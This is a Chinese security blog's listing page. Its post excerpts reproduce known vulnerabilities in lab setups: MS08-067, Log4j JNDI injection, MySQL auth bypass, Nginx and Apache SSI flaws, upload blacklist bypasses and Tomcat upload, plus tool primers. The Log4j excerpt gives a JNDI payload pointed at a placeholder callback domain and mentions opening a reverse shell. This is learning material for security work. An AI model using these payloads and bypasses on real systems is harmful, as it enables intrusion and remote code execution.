- 博客(15)
- 收藏
- 关注
原创 缓冲区溢出MS08-067漏洞复现
MS08-067漏洞全称是“Windows Server 服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。当用户在受影响的系统上受到RPC请求时,该漏洞会允许远程代码执行,攻击者可以在未经身份验证情况下利用此漏洞运行任意代码。同时,该漏洞可以用于蠕虫攻击。
2023-11-09 14:45:52
490
1
原创 Apache Log4j2 lookup JNDI 注入漏洞复现(CVE-2021-44228)
在其2.0到2.14.1版本中存在一处JNDI注入漏洞,log4j的默认配置允许使用解析日志消息中的对象。攻击者可以构造恶意的日志消息,其中包含一个恶意的Java对象,当log4j尝试解析这个对象时,它将会触发漏洞,导致攻击者能够执行任意代码。通过DNSLog平台(http://www.dnslog.cn/)获取到域名http://xxxxxx,构造payload ${jndi:ldap://http://xxxxxx}这里IP是kali的IP,端口是你等会nc监听的端口。JNDI注入反弹shell。
2023-04-02 22:46:57
722
原创 Vulhub复现mysql身份认证绕过漏洞(CVE-2012-2122)
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。我们可以使用Meterpreter中的模块或者使用特殊的SQL语句进行身份绕过登录,出现这个漏洞是由于memcmp函数只返回返回-128到127范围内的值,在某些平台上进行了优化,导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。爆破多次即绕过身份验证,成功登录数据库,复现成功。2、访问3306端口查看环境。
2023-03-17 11:42:27
383
原创 vulhub Nginx文件解析漏洞
由于用户的配置问题,在php的配置文件中cgi.fix_pathinfo默认开启,当url中有不存在的文件,php会向前递归,将../.jpg/.php解析为/.php文件。将php-fpm.conf中的 security.limit_extensions =.php,只支持php后缀解析。http://IP/uploadfiles/图片.jpg/.php。在文件路径后加上.php,在进行访问,发现php代码已经被执行。访问http://IP/,看到这个页面表示漏洞环境搭建成功。访问文件的路径,正常访问。
2023-03-06 09:26:11
413
原创 文件上传漏洞黑名单绕过
NTFS储存数据流的一个属性,这样我们去访问的时候,我们请求的会被它认为是 phpinfo.php 本身的数据。有时会直接检测你上传的文件,如果你上传了上面规定的文件,他会把你的后缀名去掉,但是他只会过滤一次,这时我们可以用双写进行绕过,只要写两个php就行了,pphphp将php过滤后还剩下php,即可上传成功。然后我们就可以先上传一个.jpg的图片马,然后再上传.htaccess的文件,然后在有.htaccess的文件夹内.jpg就会被解析为.php的文件,然后上传的图片马就可以发挥作用了。
2023-02-27 11:55:36
980
原创 upload-labs靶场的安装搭建
3、将下载的压缩包解压到phpstudy文件,phpstudy/www网站的根目录下。运行镜像docker run -d -p 90:80 cuer/upload-labs。4、本地浏览器访问127.0.0.1/upload-labs/就可以访问靶场了。2、然后到GitHub去下载upload-labs的源码。1、首先安装phpstudy的环境,下载进行安装。将upload-labs镜像拉取到本地仓库。在镜像仓库搜索upload-labs镜像。查看本地镜像,如图下载成功。
2023-02-24 11:44:50
4888
原创 Apache SSI 远程命令执行漏洞复现
访问http://139.9.66.23:8080/upload.php,可以看到一个上传页面。的基于服务器的网页制作技术。文件的默认扩展名是.stm、.shtm和.shtml。如果目标服务器开启了SSI和CGI支持,我们就可以上传shtml的文件,利用。访问一下我们上传的文件,看到如下图的代码,即说明存在远程命令执行漏洞。运行一个支持SSI和CGI的apache服务器。上传一个php的文件,提示上传的文件类型不支持。创建一个shell.shtml文件,内容如下。上传shell.shtml文件,上传成功。
2023-02-20 10:25:17
244
原创 sql注入介绍
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。在原来的sql语句中插入payload,攻击者注入一段包含注释符的sql语句,将原来的语句的一部分注释,注释掉的部分语句不会被执行。即把sql命令插入到web的请求表单中,欺骗服务器,以此来获取服务器的数据和权限。把用户输入的数据当作代码执行。
2023-02-17 11:45:17
727
原创 Tomcat任意文件上传漏洞(CVE-2017-12615)
2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,其中远程代码执行漏洞(CVE-2017-12615)。一定条件下,攻击者可以利用该漏洞,通过上传的jsp文件,在服务器上执行任意代码,导致数据泄露或权限被获取,存在高安全风险。
2023-02-12 19:47:13
577
原创 破解工具john提示No password hashes loaded (see FAQ)
暴力破解工具john提示No password hashes loaded (see FAQ)1、测试环境kali 2021.1 2、首先将两个密码信息文件合并 3、使用john进行破解,但是提示No password hashes loaded (see FAQ)
2023-02-09 15:06:10
5730
3
原创 Burpsuite的介绍和使用
Burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。也就是说,Burpsuite是web应用程序渗透测试集成平台。从应用程序攻击表面的最初映射和分析,到寻找和利用安全漏洞等过程。Burpsuite可以高效率的多个工具一起工作。
2023-02-07 11:28:35
3869
原创 Namp的功能与使用
nmap,Network Mapper,是一款强大的主机发现和端口扫描的工具。基本功能:(1)扫描主机端口,嗅探所提供的网络服务(2)探测一组主机是否在线(3)识别主机的操作系统(4)到达主机经过的路由,系统开放的端口。
2023-01-15 11:54:14
5198
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人